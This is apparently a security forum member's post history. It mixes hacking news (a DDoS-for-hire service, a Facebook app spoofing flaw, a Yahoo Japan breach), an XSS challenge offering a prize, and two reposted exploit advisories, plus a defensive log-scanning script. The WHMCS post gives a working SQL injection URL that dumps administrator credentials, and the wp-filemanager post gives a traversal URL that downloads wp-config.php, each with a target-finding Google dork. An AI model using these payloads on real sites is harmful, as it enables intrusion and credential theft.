akkiliON

Active Members
  • Posts: 1177
  • Joined
  • Last visited
  • Days Won: 46

Everything posted by akkiliON

  1. A website that can be described as "DDoS for hire" is perfectly legitimate, according to the owner. Malicious sites that offer attack services are not strangers on the Internet, but web sites sponsored by law enforcement are another story altogether.

     Ragebooter is one of many sites that accept payment through PayPal in order to flood sites with junk traffic, overloading servers and denying others access. The service uses a technique called DNS Reflection to flood a website and amplify the amount of traffic directed at an address. Investigation shows the site operator is a guy named Justin Folland located in Memphis, Tennessee.

     "Since it is a public service on a public connection to other public servers this is not illegal. Nor is spoofing the sender address. If the root user of the server does not want that used they can simply disable recursive DNS. My service is a legal testing service. How individuals use it is at their own risk and responsibilities. I do not advertise this service anywhere nor do I entice or encourage illegal usage of the product. How the user uses it is at their own risk. I provide logs to any legal law enforcement and keep logs for up to 7 days."

     He claimed that his service was not used to attack people, but only for legitimate stress-testing, then he changed his story and said he was only managing the service for someone else. It is not clear if it is a guy who works with the FBI, but what is certain is that the service is alive and kicking. An FBI spokesman would neither confirm nor deny the claim.

     FBI sponsored Ragebooter DDoS attack service - TheHackerNews
  2. There are many unpatched loopholes or flaws in the Facebook website that allow hackers to inject external links or images into a wall, hijack any Facebook account or bypass your social privacy. Today we are going to report about another unfixed Facebook app vulnerability that allows a hacker to spoof the content of any Facebook app easily.

     Nir Goldshlager from Break Security today exposed another major flaw that allows a hacker to wall-post spoofed messages from trusted applications like Saavn, Candy Crush, Spotify, Pinterest, or really any other application on Facebook.

     In 2012 Facebook's method of publishing called stream.publish and the Stream Publish Dialog looks like the following:

     Where the app_id and attachment (swfsrc, imgsrc, href) parameters can be targeted by hackers, i.e. using the app_id value as the application ID of any application you want to spoof (Saavn, Spotify, etc.), and an attacker must produce attachment parameters like swfsrc and imgsrc. If the Stream post URL security option is disabled by the developer of that application, a hacker can use any remotely uploaded swf file as the attachment parameter.

     "every time a victim visits my wall post, they will see content spoofing from a Facebook application that they generally trust. Clicking the link on the post makes an swf file from the external website execute on his client machine." Nir said.

     But in 2013, Facebook changed the mechanism of stream.publish posting and introduced new parameters as explained below:

       1. Link parameter: With this parameter, we will include our malicious external link (virus exe file, 0days, Phishing site, or any other malicious link).
       2. Picture Parameter: This parameter is only usable if we want to spoof the content with an image. The content of the image will only display correctly on our Wall post. It will not display correctly in the newsfeed, making it relevant only to wall post app spoofing.
       3. Caption Parameter: This parameter will allow an attacker to choose which website the content came from, for example: Facebook.com, Zynga.com, Ownerappdomain.com
       4. Name Parameter: This parameter produces the title we desire. Whenever the victim clicks on that title, he will be taken to our malicious website.

     Few examples as given below: Diamond Dash: SoundCloud: Skype: Slideshare

     Spoofing the parameters again allows one to spoof the content of any Facebook app, and the flaw is still unpatched. These techniques can be widely used by cyber crooks to social engineer Facebook users or to install malware on their systems.

     Source: Facebook Hacking, technique to Spoof the content of any Facebook App - TheHackerNews
  3. 22 million Yahoo! Japan's user IDs may have been stolen during an unauthorised attempt to access the administrative system of its Japan portal.

     "We don’t know if the file of 22 million user IDs was leaked or not, but we can't deny the possibility given the volume of traffic between our server and external terminals" Yahoo said. The information did not include passwords and the kind of data necessary to verify a user’s identity or reset passwords, it said, adding that the company had updated its security measures to prevent a repeat of the incident.

     In 2011, Sony said information such as usernames, passwords and birth dates of more than 100 million people may have been compromised after hackers struck the PlayStation Network and Sony Online Entertainment services.

     Japan acknowledges that its preventative measures against cyberattacks remain underdeveloped, with the national police agency having announced this month it would launch a team to analyze and combat cyberattacks. Japan Aerospace Exploration Agency said last month that information related to the International Space Station may have been leaked during an unauthorized attempt to access its system.

     22 million Yahoo IDs stolen from their Japanese Server - The Hacker News
  4. TrendMicro-HouseCall TROJ_GEN.F47V0318 20130415 VBA32 Worm.Shakblades Jiangmin Backdoor/MSIL.acp
  5. OK! Thanks for answering my questions! Drink them in good health
  6. What about the other one? The one where you could close any account, or something like that, if I'm not mistaken... Didn't they reply to you about that one either? Thanks!
  7. So have you received any further message from them?
  8. Congrats! Now that's what I call a show off
  9. Thanks! You did a "good" job! Why don't you let others solve this challenge too? I wanted to see how many people here would solve this challenge! I made this challenge mostly to attract as many contestants as possible who are beginners in this field! And I was going to post the solution once the first 10 had solved this challenge! Maybe that way they would have learned something too! Since you solved it anyway, you could have nicely sent me a P.M. with the solution! I hope you won't do this stupid thing again in the future! Thanks

     ON: Congratulations to everyone who took part! It seems the prize will be awarded to cemama! It seems danyweb09 and gafi did not want this prize!

     // cemama, you have a P.M.!
  10. Congratulations Sega! It seems Sega doesn't want the Steam account either! I still have it! The next one to solve it will get the Steam account if they want it!
  11. TheTime was first and won a Steam account! Congratulations! I'll make more challenges with other prizes soon!

      // EDIT: It seems he no longer wants the Steam account... but he has a place in the solvers list! The account goes to the next one who solves it! Good luck
  12. I thought I'd make a small challenge and offer a prize! (I don't have anything better to give you)

      # Target: Swingnote
      # Vulnerability: XSS Reflected
      # Proof: http://img694.imageshack.us/img694/132/challengexss.jpg
      # Vulnerable field: String

      Rules: The first to send me the solution, by P.M., will win a Steam account with the following games:
      - Counter-Strike
      - Counter-Strike: Condition Zero
      - Counter-Strike: Condition Zero Deleted Scenes

      You may be wondering why I censored so much! If you solve this challenge you will see why. If a moderator wants proof that this site is vulnerable, P.M. me and I will reply! When you send the solution I also want to see what vector you used! Good luck!

      // I forgot something! I'm also making a list of those who solved this challenge but did not receive any prize!

      Solvers
      - TheTime
      - Sega
      - danyweb09
      - gafi
      - cemama
      - Hertz
      -
      -
      -
      -
      Closed!
  13. I'd hand out a BAN for nonsense like this!
  14. # Title: WHMCS 4.x SQL Injection Vulnerability
      # Google Dork: intext:"Powered by WHMCompleteSolution" OR inurl:"submitticket.php?"?
      # Author: Ahmed Aboul-Ela
      # Contact: Ahmed.Aboul3la[at]gmail[dot]com
      # Date: 14/5/2013
      # Vendor: http://www.whmcs.com
      # Version: 4.5.2 and prior versions should be affected too
      # Tested on: Linux

      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      SQL Injection Vulnerability in "/includes/invoicefunctions.php"
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      - Vulnerable Code Snippet :

          LINE 582: function pdfInvoice($id)
          LINE 583: {
          LINE 686:     if ($CONFIG['GroupSimilarLineItems'])
          LINE 687:     {
          LINE 688:         $result = full_query('' . 'SELECT COUNT(*),id,type,relid,description,amount,taxed FROM tblinvoiceitems WHERE invoiceid=' . $id . ' GROUP BY `description`,`amount` ORDER BY id ASC');
          LINE 689:     }

      As we can see here, the $id argument of the pdfInvoice function has been used directly in the MySQL query without any sanitization, which leads directly to SQL Injection.

      It appears that the pdfInvoice function is being called in the "/dl.php" file as follows:

          LINE 21: if ($type == 'i')
          LINE 22: {
          LINE 23:     $result = select_query('tblinvoices', '', array(
          LINE 24:         'id' => $id
          LINE 25:     ));
          LINE 26:     $data = mysql_fetch_array($result);
          LINE 27:     $invoiceid = $data['id'];
          LINE 28:     $invoicenum = $data['invoicenum'];
          LINE 29:     $userid = $data['userid'];
          LINE 30:     if ((!$_SESSION['adminid'] && $_SESSION['uid'] != $userid))
          LINE 31:     {
          LINE 32:         downloadLogin();
          LINE 33:     }
          LINE 34:     if (!$invoicenum)
          LINE 35:     {
          LINE 36:         $invoicenum = $invoiceid;
          LINE 37:     }
          LINE 38:     require('includes/clientfunctions.php');
          LINE 39:     require('includes/countries.php');
          LINE 40:     require('includes/invoicefunctions.php');
          LINE 41:     require('includes/tcpdf.php');
          LINE 42:     $pdfdata = pdfInvoice($id);
          LINE 43:     header('Pragma: public');
          LINE 44:     header('Expires: Mon, 26 Jul 1997 05:00:00 GMT');
          LINE 45:     header('Last-Modified: ' . gmdate('D, d M Y H:i:s') . ' GMT');
          LINE 46:     header('Cache-Control: must-revalidate, post-check=0, pre-check=0, private');
          LINE 47:     header('Cache-Control: private', false);
          LINE 48:     header('Content-Type: application/octet-stream');
          LINE 49:     header('Content-Disposition: attachment; filename="' . $invoicenum . '.pdf"');
          LINE 50:     header('Content-Transfer-Encoding: binary');
          LINE 51:     echo $pdfdata;
          LINE 52:     exit();
          LINE 53:     return 1;
          LINE 54: }

      As we can see at LINE "42", the pdfInvoice function has been called and passed the $id variable without any sanitization.
      Afterwards it forces the browser to download the generated invoice in PDF format.

      - Proof of Concept for Exploitation

      To Dump Administrator Credentials (user & pass):

          http://www.site.com/whmcs/dl.php?type=i&id=1 and 0x0=0x1 union select 1,2,3,4,CONCAT(username,0x3a3a3a,password),6,7 from tbladmins --

      ~ Result: The browser will prompt a download for the PDF invoice file; after opening it you should find the username and pw hash there

      - Precondition to Successfully Exploit the Vulnerability:

      "Group Similar Line Items" Option should be Enabled at the Invoices Settings in the WHMCS Admin ( It should be Enabled by default )

      - Credits:

      Ahmed Aboul-Ela - Information Security Consultant @ Starware Group

      WHMCS 4.x (invoicefunctions.php, id param) - SQL Injection Vulnerability
  15. Title: Wordpress wp-FileManager Local File Download Vulnerability
      Author: ByEge
      Download: http://wordpress.org/extend/plugins/wp-filemanager/
      Test Platform: Linux
      Images: http://j1305.hizliresim.com/19/f/n0xxf.jpg
      Vuln. Plat.: Web Application
      Google Dorks: inurl:wp-content/plugins/wp-filemanager/
      Test : http://server/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download

      # Exploit-DB Note:
      # In order for this to work, the "Allow Download" setting must be checked in the FileManager's settings.

      Wordpress wp-FileManager - Arbitrary File Download Vulnerability
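
A detection sketch for the two advisories in posts 14 and 15, added here and not part of either advisory or of the WHMCS / wp-filemanager code: it scans web access-log lines for `dl.php?type=i` requests whose `id` is not a plain integer and for `libfile.php` downloads whose `path` or `filename` climbs directories. The log lines, rule names and the assumption that a legitimate invoice `id` is purely numeric are constructed for this example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (not from any real server).
SAMPLE_LOG = [
    '203.0.113.5 - - [14/May/2013:10:00:01 +0000] "GET /whmcs/dl.php?type=i&id=1042 HTTP/1.1" 200 18211',
    '203.0.113.9 - - [14/May/2013:10:00:07 +0000] "GET /whmcs/dl.php?type=i&id=1%20union%20select%201,2 HTTP/1.1" 200 9120',
    '203.0.113.5 - - [14/May/2013:10:01:12 +0000] "GET /wp-content/plugins/wp-filemanager/incl/libfile.php?path=docs/&filename=report.pdf&action=download HTTP/1.1" 200 5120',
    '203.0.113.9 - - [14/May/2013:10:01:30 +0000] "GET /wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download HTTP/1.1" 200 3301',
    '203.0.113.9 - - [14/May/2013:10:01:31 +0000] "GET /wp-content/plugins/wp-filemanager/incl/libfile.php?path=%252e%252e%252f&filename=x&action=download HTTP/1.1" 200 11',
]

# The request target may be logged with raw spaces, so match lazily up to " HTTP/x.y".
REQUEST_RE = re.compile(r'"[A-Z]+ (.+?) HTTP/[0-9.]+"')

def _decode(value, rounds=3):
    """Undo nested percent-encoding (e.g. %252e -> %2e -> .)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return a rule name if the logged request matches one of the two patterns, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    query = parse_qs(target.query, keep_blank_values=True)
    params = {k: _decode(v[-1]) for k, v in query.items()}
    path = target.path.lower()
    # WHMCS dl.php: assumed rule, a legitimate invoice id is a plain integer.
    if path.endswith("/dl.php") and params.get("type") == "i":
        if not re.fullmatch(r"[0-9]+", params.get("id", "")):
            return "whmcs-dl-nonnumeric-id"
    # wp-filemanager libfile.php: a download request must not climb directories.
    if path.endswith("/wp-filemanager/incl/libfile.php") and params.get("action") == "download":
        if ".." in params.get("path", "") or re.search(r"[/\\]", params.get("filename", "")):
            return "wpfm-download-traversal"
    return None

def scan(lines):
    """Return (line number, rule) for every flagged line."""
    return [(n, rule) for n, line in enumerate(lines, 1) if (rule := classify(line))]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

A hit from either rule on a host running the affected versions is a reason to review what that response returned; the fix itself remains validating `$id` as an integer in WHMCS and disabling "Allow Download" or updating the plugin.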
  16. I would ban this nonsense of sites from the forum!
  17. BeEF - The browser exploitation framework project Useful !